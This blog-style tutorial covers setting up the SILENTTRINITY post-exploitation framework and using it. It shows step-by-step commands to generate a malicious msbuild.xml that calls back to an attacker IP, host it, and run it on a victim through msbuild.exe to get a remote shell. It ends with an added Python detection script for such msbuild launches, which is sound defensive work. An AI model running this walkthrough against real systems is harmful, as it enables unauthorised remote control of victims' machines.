Post Exploitation: SILENTTRINITY

Not too long ago, byt3bl33d3r released a tool called SILENTTRINITY. Essentially, it's an asynchronous post-exploitation agent powered by Python, IronPython, C# and .NET's DLR. Think of it as another PowerShell Empire or Meterpreter. It's awesome.

Below I'll go through a quick example of installing it and running the most basic agent. I will update this as I mess with ST more. But for now, let's just go over the basics. Let's begin.


Install


The installation of SILENTTRINITY (or ST) is fairly straightforward and easy. Here are the steps I took in order to get it up and running on my Kali host.

Below is a link to ST Github:
There's also the same instructions listed on the ST Wiki:

We first need to make sure that Python 3.7.0 is installed. Here's a link to the python 3 documentation:

Once we have Python 3.7.0 installed, it's time to install Mono. 

When installing Mono, I followed the Debian 9 instructions. I also had to install xsp4 and gtk-sharp2 manually:


apt-get install mono-xsp4
apt-get install gtk-sharp2
make clean

Once complete, verify Mono works by following mono Basics:
https://www.mono-project.com/docs/getting-started/mono-basics/

Once Mono is installed, install IronPython. Download the appropriate .deb file and install:
https://github.com/IronLanguages/ironpython2/releases


dpkg -i <debFile>

After that, it's time to download SILENTTRINITY:


cd /opt/
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git

Navigate to the SILENTTRINITY/Server directory and install the requirements:


pip3 install -r requirements.txt

There may be times where some of the requirements don't install. Just install them manually. For example, hypercorn didn't install correctly for me, so I installed it:


git clone https://github.com/pgjones/hypercorn.git
cd hypercorn
python3.7 setup.py install

Once all the requirements are complete, you can begin by running ST.

Running SILENTTRINITY

In its most basic form, we can create a msbuild.xml file that we will use to create our agent.

We first navigate to our ST server directory:


cd /opt/SILENTTRINITY/Server

We then generate our malicious xml file:


python3.7 stvenom.py msbuild http 8090 -ip <attackerIP>

We then run ST with the generated resource file, which opens up a listener on port 8090:


python3.7 st.py -r msbuild.res

Next, open a new terminal and go to the same directory where msbuild.xml is. Host the file using something like python's SimpleHTTPServer:


python -m SimpleHTTPServer 8080

With your malicious file hosted and ST ready for the exploit, we then go to the victim machine and download the msbuild.xml file. Simply open a browser, navigate to the attacker IP on port 8080 and download msbuild.xml.

Once the xml file is downloaded, we can run the file:


C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml

At this point, look in your attacker machine's ST instance and you should now have a shell!
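From the blue-team side, the step that matters is the last one: a legitimate signed binary (msbuild.exe) being handed a project file that was just downloaded to a user folder. As an added example (my own code, not part of SILENTTRINITY or the original post), the script below scores process-creation records for exactly that pattern. The records are constructed samples in a simple key=value|key=value format whose fields mirror what Sysmon Event ID 1 carries (Image, CommandLine, CurrentDirectory, ParentImage, User); the extension list, path fragments, parent list and weights are my assumptions and should be tuned against real build traffic in your environment.

```python
"""
Added detection example for MSBuild-based agent launches.
Not SILENTTRINITY code; all log lines below are constructed samples.
"""
import ntpath
import re

# Extensions MSBuild consumes in a normal build; anything else (like .xml) is odd.
BUILD_EXTENSIONS = {".csproj", ".vbproj", ".fsproj", ".vcxproj",
                    ".proj", ".sln", ".targets", ".props"}

# Path fragments where a dropped payload is common and a build tree is not (assumed list).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\temp\\", "\\tmp\\",
                 "\\public\\", "\\programdata\\", "\\desktop\\")

# Shells and script hosts: a weak signal alone, stronger combined with the other two.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe",
                 "wscript.exe", "cscript.exe", "mshta.exe"}

ALERT_THRESHOLD = 2  # assumed weighting; see score_record()

# Constructed sample telemetry, one record per line (not real logs).
SAMPLE_LOG = [
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|CommandLine=msbuild.exe msbuild.xml|CurrentDirectory=C:\Users\alice\Downloads|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\alice",
    r'Image=C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\MSBuild\15.0\Bin\MSBuild.exe|CommandLine="MSBuild.exe" C:\src\app\app.csproj /p:Configuration=Release|CurrentDirectory=C:\src\app|ParentImage=C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\devenv.exe|User=CORP\dev1',
    r'Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|CommandLine=msbuild.exe /t:Build "C:\build\work\1\s\Service.sln"|CurrentDirectory=C:\build\work\1\s|ParentImage=C:\Windows\System32\cmd.exe|User=CORP\buildsvc',
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|CommandLine=msbuild.exe update.csproj|CurrentDirectory=C:\Users\bob\AppData\Local\Temp|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=CORP\bob",
    r"Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe msbuild.xml|CurrentDirectory=C:\Users\alice\Downloads|ParentImage=C:\Windows\explorer.exe|User=CORP\alice",
]


def parse_record(line):
    """Split one 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def split_command_line(cmdline):
    """Tokenize a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def project_path(record):
    """Absolute path of the project file given to msbuild.exe, or None if it relied on the cwd."""
    for tok in split_command_line(record.get("CommandLine", ""))[1:]:
        if tok.startswith(("/", "-")):
            continue  # switches such as /t:Build or /p:Configuration=Release
        if re.match(r"^[A-Za-z]:\\", tok) or tok.startswith("\\\\"):
            return tok
        return ntpath.join(record.get("CurrentDirectory", ""), tok)
    return None


def score_record(record):
    """Return (score, reasons) for one record; non-msbuild records score 0."""
    if ntpath.basename(record.get("Image", "")).lower() != "msbuild.exe":
        return 0, []
    score, reasons = 0, []
    proj = project_path(record)
    if proj is not None:
        ext = ntpath.splitext(proj)[1].lower()
        if ext not in BUILD_EXTENSIONS:
            score += 2
            reasons.append(f"project extension {ext or '(none)'} is not a build file: {proj}")
        if any(frag in proj.lower() for frag in USER_WRITABLE):
            score += 1
            reasons.append(f"project file lives in a user-writable location: {proj}")
    parent = ntpath.basename(record.get("ParentImage", "")).lower()
    if parent in SHELL_PARENTS:
        score += 1
        reasons.append(f"launched from a shell or script host: {parent}")
    return score, reasons


def scan(lines, threshold=ALERT_THRESHOLD):
    """Return alerts as (user, score, reasons) for records at or above the threshold."""
    alerts = []
    for line in lines:
        record = parse_record(line)
        score, reasons = score_record(record)
        if score >= threshold:
            alerts.append((record.get("User", "?"), score, reasons))
    return alerts


if __name__ == "__main__":
    for user, score, reasons in scan(SAMPLE_LOG):
        print(f"[score {score}] {user}")
        for reason in reasons:
            print("   -", reason)
```

Run as-is, it alerts on the first record (an .xml project in Downloads, spawned from cmd.exe) and on the fourth (a .csproj dropped in a Temp folder and run from PowerShell), while the developer's build from Visual Studio and the build-server job score below the threshold. The point of weighting rather than matching only on ".xml" is that renaming the project file should not be enough to stay quiet; correlating with a Sysmon Event ID 3 network connection from the same msbuild.exe process id would tighten this further.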

Hope this has been helpful.

Until next time.